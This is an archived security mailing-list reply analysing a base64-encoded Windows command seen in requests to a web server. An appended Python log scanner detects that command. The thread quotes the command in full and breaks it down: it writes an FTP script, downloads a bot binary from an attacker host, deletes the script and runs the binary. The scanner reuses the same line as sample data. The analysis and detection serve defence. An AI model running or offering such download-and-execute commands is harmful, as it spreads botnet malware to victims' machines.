[Dshield] Anyone seen wiit.exe?

jayjwa jayjwa at atr2.ath.cx
Tue Aug 30 07:42:55 GMT 2005

On Mon, 29 Aug 2005, bgreenwood wrote:

-> Over about the past two weeks or so I have noticed the following
being base64 encoded in the URI of some incoming requests to my site...

Are you running IIS, by chance?

-> cmd /k echo open 17113 > o&echo user 1 1 >> o &echo
get wiit.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &wiit.exe

This command is calling the interpreter to create an ftp script that is
then fed into ftp.exe. Script "o" looks like this:

open 17113
user 1 1
get wiit.exe

That script downloads from the attacker, in this case
at port 17113, from a bot ftp server, the bot binary, in this case
"wiit.exe". The last command feeds the script to ftp.exe, quietly deletes
it, and runs it.

ftp -n -s:o     downloads it
& del /F /Q o   deletes it
& wiit.exe      runs what just got downloaded

-> I have seen this activity before but with different filenames being
called out.  I don't recall seeing the wiit.exe or know exactly what
it is supposed to be doing. Has anyone seen this or know what
it is supposed to be doing once executed?

Check in

C:\Windows\System32  (depending on the case of the OS)

and another reference to the file in HKLM of the registry, Run, RunOnce
and/or RunServices. There are a few others on some.

These are the download & exec commands that are sent from the attacking
machine to the new victim machine once successful exploitation has
occurred. You more than likely have a lot of irc-bot infected machines
and/or a totally compromised network, depending on how many of your
machines are doing this/taking these requests. Someone is then sitting in
an IRC channel somewhere, using these machines to DDoS, send SPAM, infect
other people's machines, harvest emails, Windows CD keys, run SOCKS4/5
proxies, etc.

Note where the machines are connecting to. Record the IP, whois and 
contact point for the host(s) in question.

Shut down the machine, boot from a clean disk to safe mode or another OS
like Linux and mount the disk (that is, do not let the Registry stuff
execute, as little as possible should run. If the process does start that
you think is the bot, task kill it.) Remove the referenced file. Remove
all mentions of the file from the registry. Make sure that "System
Restore" is disabled during this. You might need to repair the hosts file.
Patch the system, firewall off the known bot/exploit ports, and IMHO
swap IIS for Apache and restart. Repeat for each machine.

Mail the contact point for the server you recorded and tell him about his 
botnet. If you're feeling adventuresome, follow the path of the bots back 
to the server and see if you can get into the bot channel and learn 
anything about the botmaster.
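
Added example, not part of the original post: a log scan that decodes base64-looking tokens in request lines and flags the ftp download-and-execute pattern broken down above. The log format, client addresses, paths and parameter names are constructed; the command is the one quoted in the thread, with the address elided as it is there.

```python
import base64
import binascii
import re
from urllib.parse import unquote

B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")        # long base64-looking token
FTP_SCRIPT = re.compile(r"\bftp\b[^&|]*-s:(\S+)", re.I)   # ftp.exe fed a script file
FTP_GET = re.compile(r"\bget\s+(\S+)", re.I)              # file the script retrieves

def decoded_tokens(line):
    """Yield printable ASCII text decoded from base64-looking runs in a log line."""
    for run in B64_RUN.findall(unquote(line)):
        run = run.rstrip("=")
        run += "=" * (-len(run) % 4)          # restore padding stripped or lost in transit
        try:
            raw = base64.b64decode(run, validate=True)
        except (binascii.Error, ValueError):
            continue
        text = raw.decode("ascii", errors="ignore")
        if len(text) == len(raw) and text.isprintable():
            yield text

def scan(lines):
    """Return one finding per decoded token that scripts ftp.exe to fetch a file."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for text in decoded_tokens(line):
            script, fetched = FTP_SCRIPT.search(text), FTP_GET.findall(text)
            if not (script and fetched):
                continue
            steps = [step.strip() for step in text.split("&")]   # chained cmd steps
            findings.append({"line": number, "script": script.group(1), "fetched": fetched,
                             "executed": [f for f in fetched if f in steps], "decoded": text})
    return findings

def encode_sample(text):
    return base64.b64encode(text.encode("ascii")).decode("ascii")

# Constructed sample data (assumed common-log-style lines, documentation IP range).
QUOTED_CMD = ("cmd /k echo open 17113 > o&echo user 1 1 >> o &echo get wiit.exe >> o "
              "&echo quit >> o &ftp -n -s:o &del /F /Q o &wiit.exe")
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Aug/2005:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 512',
    f'192.0.2.66 - - [29/Aug/2005:10:01:07 +0000] "GET /page?q={encode_sample(QUOTED_CMD)} HTTP/1.0" 404 0',
    f'192.0.2.11 - - [29/Aug/2005:10:02:00 +0000] "GET /app?s={encode_sample("user=alice;theme=dark;lang=en")} HTTP/1.0" 200 9',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The "fetched" and "executed" names in each finding are the filenames to look for on disk and in the Run, RunOnce and RunServices keys mentioned above.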

